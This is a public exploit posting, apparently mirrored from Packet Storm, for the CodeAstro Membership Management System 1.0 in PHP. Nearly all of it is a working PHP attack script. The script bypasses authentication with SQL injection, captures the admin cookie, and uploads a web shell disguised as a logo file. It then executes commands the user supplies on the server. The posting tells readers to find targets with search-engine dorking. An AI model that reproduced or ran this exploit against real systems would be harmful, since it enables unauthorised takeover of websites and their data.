Share
## https://sploitus.com/exploit?id=PACKETSTORM:181551
=============================================================================================================================================  
| # Title : Membership Management System version 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This payload inject php code contains a back door.  
  
[+] Line 20 Set your Target.  
  
[+] save payload as poc.php  
  
[+] usage from cmd : C:\www\test>php 1.php  
  
[+] payload :  
  
<?php  
// Function to generate a random string of a given length  
function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {  
return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size);  
}  
  
// Generating a random web shell file  
$shellFile = randomGen() . ".php";  
  
// Creating a payload for the login  
$payload = [  
'email' => "test@mail.com' or 0=0 #", // Adjust based on the target  
'password' => 'a',  
'login' => ''  
];  
  
$session = curl_init();  
  
// Target base URL (change this to your target IP or domain)  
$urlBase = "http://127.0.0.1/Membership/";  
  
// Login  
$url = $urlBase . "index.php";  
echo "=== Executing SQL Injection ===\n";  
  
// Set cURL options for the POST request  
curl_setopt($session, CURLOPT_URL, $url);  
curl_setopt($session, CURLOPT_POST, 1);  
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));  
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($session, CURLOPT_HEADER, true); // Include header in output  
curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);  
curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging  
  
// Execute the login request  
$response = curl_exec($session);  
  
// Separate headers from body  
$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);  
$headers = substr($response, 0, $header_size);  
$body = substr($response, $header_size);  
  
// Check if 'Set-Cookie' header is present in the headers  
preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);  
$cookie = '';  
if (isset($matches[1][0])) {  
$cookie = $matches[1][0];  
}  
  
// Print headers for debugging  
echo "=== Response Headers ===\n";  
echo $headers;  
  
if ($cookie) {  
echo "=== Authenticated admin cookie: " . $cookie . " ===\n";  
} else {  
echo "Set-Cookie header not found in the response.\n";  
exit();  
}  
  
// Prepare to upload shell  
$url = $urlBase . "settings.php";  
  
// Get user input for the command to execute  
echo "Enter the command to execute: ";  
$cmd_input = trim(fgets(STDIN));  
  
// PHP code to execute the command received from the user  
$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";  
  
// Prepare the multipart/form-data  
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));  
$body = "--$boundary\r\n";  
$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";  
$body .= "Membership System\r\n";  
$body .= "--$boundary\r\n";  
$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";  
$body .= "$\r\n";  
$body .= "--$boundary\r\n";  
$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";  
$body .= 'Content-Type: application/x-php' . "\r\n\r\n";  
$body .= $php_code . "\r\n";  
$body .= "--$boundary\r\n";  
$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";  
$body .= "\r\n";  
$body .= "--$boundary--\r\n";  
  
// Set cURL options for file upload  
curl_setopt($session, CURLOPT_URL, $url);  
curl_setopt($session, CURLOPT_POST, 1);  
curl_setopt($session, CURLOPT_POSTFIELDS, $body);  
curl_setopt($session, CURLOPT_HTTPHEADER, [  
'Content-Type: multipart/form-data; boundary=' . $boundary,  
'Cookie: ' . $cookie  
]);  
  
echo "=== Logging in and uploading shell " . $shellFile . " ===\n";  
  
// Execute the upload request  
$response = curl_exec($session);  
  
// Close cURL session  
curl_close($session);  
  
// Curl the shell for testing  
$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);  
echo "=== Issuing the command: " . $requestUrl . " ===\n";  
  
echo "=== CURL OUTPUT ===\n";  
echo file_get_contents($requestUrl);  
?>  
  
[+]   
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================